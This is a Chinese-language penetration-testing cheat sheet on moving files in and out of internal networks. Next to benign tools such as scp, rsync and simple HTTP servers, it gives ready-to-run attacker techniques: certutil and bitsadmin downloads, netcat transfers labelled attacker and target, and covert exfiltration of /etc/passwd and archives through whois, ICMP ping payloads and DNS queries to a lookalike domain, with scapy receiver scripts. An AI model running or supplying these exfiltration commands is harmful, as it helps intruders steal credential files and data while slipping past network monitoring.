内网文件的传输和下载

内网文件的传输和下载

wput

wput dir_name ftp://linuxpig:123456@host.com/

wget

wget http://site.com/1.rar -O 1.rar

ariac2（需安装）

aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2

powershell

\(p = New-Object System.Net.WebClient \)p.DownloadFile("http://domain/file","C:%homepath%file")

vbs脚本

Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile " C:%homepath%\file", 2 '
end with
执行 ：cscript test.vbs

Perl

#!/usr/bin/perl 
use LWP::Simple; 
getstore("http://domain/file", "file");
执行：perl test.pl

Python

!/usr/bin/python

import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()
执行：python test.py

Ruby

!/usr/bin/ruby

require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
r = http.get("/file")
open("save_location", "wb") { |file|
file.write(r.body)
}
}
执行：ruby test.rb

PHP

执行：php test.php

NC attacker

cat file | nc -l 1234
target

nc host_ip 1234 > file

FTP

ftp 127.0.0.1 username password get file exit

TFTP

tftp -i host GET C:%homepath%file location_of_file_on_tftp_server
Bitsadmin

bitsadmin /transfer n http://domain/file c:%homepath%file

Window 文件共享

net use x: \127.0.0.1\share /user:example.comuserID myPassword

SCP 本地到远程

scp file user@host.com:/tmp
远程到本地

scp user@host.com:/tmp file

rsync 远程rsync服务器中拷贝文件到本地机

rsync -av root@192.168.78.192::www /databack
本地机器拷贝文件到远程rsync服务器

rsync -av /databack root@192.168.78.192::www
certutil.exe

certutil.exe -urlcache -split -f http://site.com/file
copy

copy \IP\ShareName\file.exe file.exe
WHOIS 接收端 Host B：

nc -vlnp 1337 | sed "s/ //g" | base64 -d
发送端 Host A：

whois -h host_ip -p 1337 cat /etc/passwd | base64
WHOIS + TAR First:

ncat -k -l -p 4444 | tee files.b64 #tee to a file so you can make sure you have it
Next

tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits
Finally

cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv #to get the files out
PING 发送端:

xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done
接收端ping_receiver.py:

import sys

try:
from scapy.all import *
except:
print("Scapy not found, please install scapy: pip install scapy")
sys.exit(0)

def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 8:
data = pkt[ICMP].load[-4:]
print(f'{data.decode("utf-8")}', flush=True, end="", sep="")

sniff(iface="eth0", prn=process_packet)
python3 ping_receiver.py
DIG 发送端:

xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done
接收端dns_reciver.py:

try:
from scapy.all import *
except:
print("Scapy not found, please install scapy: pip install scapy")
def process_packet(pkt):
if pkt.haslayer(DNS):
domain = pkt[DNS][DNSQR].qname.decode('utf-8')
root_domain = domain.split('.')[1]
if root_domain.startswith('gooogle'):
print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='')

sniff(iface="eth0", prn=process_packet)
python3 dns_reciver.py
...

搭建 HTTP server

python2

python -m SimpleHTTPServer 1337
python3

python -m http.server 1337
PHP 5.4+

php -S 0.0.0.0:1337
ruby

ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'
ruby -run -e httpd . -p 1337
Perl

perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'
perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET /(.*) / })'
busybox httpd

busybox httpd -f -p 8000